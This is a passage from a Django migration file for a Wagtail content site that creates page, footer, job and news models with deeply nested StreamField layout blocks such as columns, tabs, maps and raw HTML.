'0025_auto_20161018_2101'), ('common', '0026_versionedredirect'), ('common', '0027_auto_20161025_1606'), ('common', '0028_auto_20161025_1816'), ('common', '0029_organization_logo'), ('common', '0030_auto_20161026_1433'), ('common', '0031_organization_pattern'), ('common', '0032_auto_20161027_1502'), ('common', '0033_auto_20161031_1758'), ('common', '0034_auto_20161031_2110'), ('common', '0035_auto_20161101_1423'), ('common', '0036_auto_20161101_1847'), ('common', '0037_inkinddonation'), ('common', '0038_organization_url'), ('common', '0039_auto_20161102_1850'), ('common', '0040_auto_20161102_1900'), ('common', '0041_auto_20161109_1602'), ('common', '0042_auto_20161111_1901'), ('common', '0043_auto_20161111_1924'), ('common', '0044_auto_20161114_1553'), ('common', '0045_auto_20161115_1644'), ('common', '0046_auto_20161115_1703'), ('common', 
'0047_auto_20161115_1743'), ('common', '0048_auto_20170111_1744')]
initial = True
dependencies = [
('wagtailimages', '0013_make_rendition_upload_callable'),
('wagtailforms', '0003_capitalizeverbose'),
('taggit', '0002_auto_20150616_2121'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('wagtailcore', '0029_unicode_slugfield_dj19'),
('wagtailimages', '0015_fill_filter_spec_field'),
('wagtailredirects', '0005_capitalizeverbose'),
]
operations = [
migrations.CreateModel(
name='CustomPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('content', wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('twocolumn', wagtail.wagtailcore.blocks.StructBlock((('left_column_size', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('12', 'Full Width'), ('11', '11/12'), ('10', '5/6'), ('9', 'Three Quarters'), ('8', 'Two Thirds'), ('7', '7/12'), ('6', 'Half Width'), ('5', '5/12'), ('4', 'One Third'), ('3', 'One Quarter'), ('2', '1/6'), ('1', '1/12')], default='6')), ('right_column_size', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('12', 'Full Width'), ('11', '11/12'), ('10', '5/6'), ('9', 'Three Quarters'), ('8', 'Two Thirds'), ('7', '7/12'), ('6', 'Half Width'), ('5', '5/12'), ('4', 'One Third'), ('3', 'One Quarter'), ('2', '1/6'), ('1', '1/12')], default='6')), ('left_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('customized_image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), 
('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!'))), classname='col4', icon='arrow-left', label='Left column content')), ('right_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('customized_image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!'))), classname='col4', icon='arrow-right', label='Right column content'))))), ('threecolumn', wagtail.wagtailcore.blocks.StructBlock((('left_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(template='common/blocks/image.html')), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), classname='col4', icon='arrow-left', label='Left column content')), ('center_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(template='common/blocks/image.html')), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', 
wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), classname='col4', icon='arrow-right', label='Center column content')), ('right_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', 
wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), classname='col4', icon='arrow-right', label='Right column content'))))), ('tab_index', wagtail.wagtailcore.blocks.StructBlock((('display_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'vertical'), ('horizontal', 'horizontal')])), ('tabsIndexes', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('id', wagtail.wagtailcore.blocks.TextBlock(max_length=25, required=True)), ('display', wagtail.wagtailcore.blocks.TextBlock(max_length=40, required=True))))),)))))), ('tabcontainerblock', wagtail.wagtailcore.blocks.StructBlock((('tabs', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('id', wagtail.wagtailcore.blocks.CharBlock(required=True)), ('isActive', wagtail.wagtailcore.blocks.BooleanBlock(default=False, required=False)), ('container', wagtail.wagtailcore.blocks.StreamBlock((('two_column_block', wagtail.wagtailcore.blocks.StructBlock((('left_column_size', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('12', 'Full Width'), ('11', '11/12'), ('10', '5/6'), ('9', 'Three Quarters'), ('8', 'Two Thirds'), ('7', '7/12'), ('6', 'Half Width'), ('5', '5/12'), ('4', 'One Third'), ('3', 'One Quarter'), ('2', '1/6'), ('1', '1/12')], default='6')), ('right_column_size', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('12', 'Full Width'), ('11', '11/12'), ('10', '5/6'), ('9', 'Three Quarters'), ('8', 'Two Thirds'), ('7', '7/12'), ('6', 'Half Width'), ('5', 
'5/12'), ('4', 'One Third'), ('3', 'One Quarter'), ('2', '1/6'), ('1', '1/12')], default='6')), ('left_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('customized_image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!'))), classname='col4', icon='arrow-left', label='Left column content')), ('right_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('customized_image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!'))), classname='col4', icon='arrow-right', label='Right column content'))))), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))))))))),))),))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='Footer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(default='untitled', max_length=255)),
('content', wagtail.wagtailcore.fields.StreamField((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('twocolumn', wagtail.wagtailcore.blocks.StructBlock((('left_column_size', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('12', 'Full Width'), ('11', '11/12'), ('10', '5/6'), ('9', 'Three Quarters'), ('8', 'Two Thirds'), ('7', '7/12'), ('6', 'Half Width'), ('5', '5/12'), ('4', 'One Third'), ('3', 'One Quarter'), ('2', '1/6'), ('1', '1/12')], default='6')), ('right_column_size', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('12', 'Full Width'), ('11', '11/12'), ('10', '5/6'), ('9', 'Three Quarters'), ('8', 'Two Thirds'), ('7', '7/12'), ('6', 'Half Width'), ('5', '5/12'), ('4', 'One Third'), ('3', 'One Quarter'), ('2', '1/6'), ('1', '1/12')], default='6')), ('left_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('customized_image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', 
wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!'))), classname='col4', icon='arrow-left', label='Left column content')), ('right_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('customized_image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, 
required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!'))), classname='col4', icon='arrow-right', label='Right column content'))))), ('threecolumn', wagtail.wagtailcore.blocks.StructBlock((('left_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(template='common/blocks/image.html')), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), classname='col4', icon='arrow-left', label='Left 
column content')), ('center_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(template='common/blocks/image.html')), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), classname='col4', icon='arrow-right', label='Center column content')), ('right_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), 
('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), classname='col4', icon='arrow-right', label='Right column content'))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), blank=True, null=True)),
],
options={
'verbose_name_plural': 'Footers',
'verbose_name': 'Footer',
},
),
migrations.CreateModel(
name='Job',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255, unique=True)),
('background', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('responsibilities', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('skills', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('notes', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('location', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('benefits', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('applying', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('core_technologies', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('referrals', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('preferred', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('qualifications', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('experience_we_need', wagtail.wagtailcore.fields.RichTextField(blank=True)),
],
options={
'ordering': ['title'],
},
bases=(models.Model, wagtail.wagtailsearch.index.Indexed),
),
migrations.CreateModel(
name='NewsArticle',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('date', models.DateField(verbose_name='Post date')),
('intro', models.CharField(blank=True, max_length=1000)),
('body', wagtail.wagtailcore.fields.RichTextField(blank=True, help_text='Fill this if the article is from COS')),
('external_link', models.CharField(blank=True, help_text='Fill this if the article is NOT from COS', max_length=255, verbose_name='External Article Link')),
('footer', models.ForeignKey(blank=True, default=1, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='common.Footer')),
('main_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('custom_url', models.CharField(default='', max_length=256)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
# NewsIndexPage: a Wagtail page that presumably serves as the listing/index
# for NewsArticle pages (inferred from the name — confirm against the model).
# 'menu_order' positions the page in the site menu (lower = further left).
migrations.CreateModel(
name='NewsIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('statement', models.CharField(blank=True, max_length=1000)),
('footer', models.ForeignKey(blank=True, default=1, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='common.Footer')),
